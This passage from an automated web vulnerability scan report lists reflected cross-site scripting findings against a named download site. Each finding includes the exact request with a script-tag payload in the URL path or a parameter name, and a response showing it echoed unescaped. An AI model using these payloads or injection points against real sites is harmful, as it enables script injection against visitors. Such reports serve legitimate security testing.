Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:36:18 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:46:23 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%228%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81070

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-graphic-apps-downloads-8-0-d.htmla94a6"><script>alert(1)</script>4f8ac4abfac" />
...[SNIP]...

1.200. http://www.x64bitdownload.com/categories/free-64-bit-graphic-apps-downloads-8-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-graphic-apps-downloads-8-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c898"><script>alert(1)</script>5c39625c5a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-graphic-apps-downloads-8-0-d.html?6c898"><script>alert(1)</script>5c39625c5a2=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:31:37 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:41:47 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%228%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-graphic-apps-downloads-8-0-d.html?6c898"><script>alert(1)</script>5c39625c5a2=1" />
...[SNIP]...

1.201. http://www.x64bitdownload.com/categories/free-64-bit-home-hobby-downloads-9-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-home-hobby-downloads-9-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfe96"><script>alert(1)</script>9b581e63618 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categoriesbfe96"><script>alert(1)</script>9b581e63618/free-64-bit-home-hobby-downloads-9-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:36:22 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categoriesbfe96"><script>alert(1)</script>9b581e63618/free-64-bit-home-hobby-downloads-9-0-d.html" />
...[SNIP]...

1.202. http://www.x64bitdownload.com/categories/free-64-bit-home-hobby-downloads-9-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-home-hobby-downloads-9-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb1e1"><script>alert(1)</script>16ffae90b65 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-home-hobby-downloads-9-0-d.htmlbb1e1"><script>alert(1)</script>16ffae90b65 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:37:01 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:47:13 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%229%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90207

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-home-hobby-downloads-9-0-d.htmlbb1e1"><script>alert(1)</script>16ffae90b65" />
...[SNIP]...

1.203. http://www.x64bitdownload.com/categories/free-64-bit-home-hobby-downloads-9-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-home-hobby-downloads-9-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c50ab"><script>alert(1)</script>641fff062a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-home-hobby-downloads-9-0-d.html?c50ab"><script>alert(1)</script>641fff062a5=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:45 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:42:49 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%229%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-home-hobby-downloads-9-0-d.html?c50ab"><script>alert(1)</script>641fff062a5=1" />
...[SNIP]...

1.204. http://www.x64bitdownload.com/categories/free-64-bit-multimedia-design-downloads-258-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-multimedia-design-downloads-258-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee9dc"><script>alert(1)</script>c8edc30f815 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categoriesee9dc"><script>alert(1)</script>c8edc30f815/free-64-bit-multimedia-design-downloads-258-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:37:45 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21338

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categoriesee9dc"><script>alert(1)</script>c8edc30f815/free-64-bit-multimedia-design-downloads-258-0-d.html" />
...[SNIP]...

1.205. http://www.x64bitdownload.com/categories/free-64-bit-multimedia-design-downloads-258-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-multimedia-design-downloads-258-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a5b9"><script>alert(1)</script>2ee9fead789 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-multimedia-design-downloads-258-0-d.html1a5b9"><script>alert(1)</script>2ee9fead789 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:04 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A3%3A%22258%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-multimedia-design-downloads-258-0-d.html1a5b9"><script>alert(1)</script>2ee9fead789" />
...[SNIP]...

1.206. http://www.x64bitdownload.com/categories/free-64-bit-multimedia-design-downloads-258-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-multimedia-design-downloads-258-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69348"><script>alert(1)</script>081516f460c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-multimedia-design-downloads-258-0-d.html?69348"><script>alert(1)</script>081516f460c=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:55 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:45:06 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A3%3A%22258%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-multimedia-design-downloads-258-0-d.html?69348"><script>alert(1)</script>081516f460c=1" />
...[SNIP]...

1.207. http://www.x64bitdownload.com/categories/free-64-bit-network-internet-downloads-10-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-network-internet-downloads-10-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 343da"><script>alert(1)</script>afffd569a53 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories343da"><script>alert(1)</script>afffd569a53/free-64-bit-network-internet-downloads-10-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:35:24 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21336

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categories343da"><script>alert(1)</script>afffd569a53/free-64-bit-network-internet-downloads-10-0-d.html" />
...[SNIP]...

1.208. http://www.x64bitdownload.com/categories/free-64-bit-network-internet-downloads-10-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-network-internet-downloads-10-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53512"><script>alert(1)</script>5772985df31 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-network-internet-downloads-10-0-d.html53512"><script>alert(1)</script>5772985df31 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:36:49 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:46:57 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2210%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-network-internet-downloads-10-0-d.html53512"><script>alert(1)</script>5772985df31" />
...[SNIP]...

1.209. http://www.x64bitdownload.com/categories/free-64-bit-network-internet-downloads-10-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-network-internet-downloads-10-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6798"><script>alert(1)</script>34b8fd1d87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-network-internet-downloads-10-0-d.html?f6798"><script>alert(1)</script>34b8fd1d87=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:31:35 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:41:41 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2210%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-network-internet-downloads-10-0-d.html?f6798"><script>alert(1)</script>34b8fd1d87=1" />
...[SNIP]...

1.210. http://www.x64bitdownload.com/categories/free-64-bit-security-privacy-downloads-11-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-security-privacy-downloads-11-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e35c"><script>alert(1)</script>7c5db426e5d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories4e35c"><script>alert(1)</script>7c5db426e5d/free-64-bit-security-privacy-downloads-11-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:36:01 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21336

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categories4e35c"><script>alert(1)</script>7c5db426e5d/free-64-bit-security-privacy-downloads-11-0-d.html" />
...[SNIP]...

1.211. http://www.x64bitdownload.com/categories/free-64-bit-security-privacy-downloads-11-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-security-privacy-downloads-11-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b6ea"><script>alert(1)</script>ea41a27d65e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-security-privacy-downloads-11-0-d.html1b6ea"><script>alert(1)</script>ea41a27d65e HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:36:52 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:47:59 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2211%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-security-privacy-downloads-11-0-d.html1b6ea"><script>alert(1)</script>ea41a27d65e" />
...[SNIP]...

1.212. http://www.x64bitdownload.com/categories/free-64-bit-security-privacy-downloads-11-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-security-privacy-downloads-11-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e1e9"><script>alert(1)</script>3697cb785d8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-security-privacy-downloads-11-0-d.html?5e1e9"><script>alert(1)</script>3697cb785d8=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:33:11 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:23 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2211%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86181

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-security-privacy-downloads-11-0-d.html?5e1e9"><script>alert(1)</script>3697cb785d8=1" />
...[SNIP]...

1.213. http://www.x64bitdownload.com/categories/free-64-bit-servers-downloads-12-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-servers-downloads-12-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7021b"><script>alert(1)</script>390428112e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories7021b"><script>alert(1)</script>390428112e3/free-64-bit-servers-downloads-12-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:37:57 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categories7021b"><script>alert(1)</script>390428112e3/free-64-bit-servers-downloads-12-0-d.html" />
...[SNIP]...

1.214. http://www.x64bitdownload.com/categories/free-64-bit-servers-downloads-12-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-servers-downloads-12-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 203dc"><script>alert(1)</script>8b744dfd2ce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-servers-downloads-12-0-d.html203dc"><script>alert(1)</script>8b744dfd2ce HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:52 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:01 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2212%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79904

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-servers-downloads-12-0-d.html203dc"><script>alert(1)</script>8b744dfd2ce" />
...[SNIP]...

1.215. http://www.x64bitdownload.com/categories/free-64-bit-servers-downloads-12-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-servers-downloads-12-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 410cf"><script>alert(1)</script>001936dc891 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-servers-downloads-12-0-d.html?410cf"><script>alert(1)</script>001936dc891=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:35:22 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:45:35 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2212%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
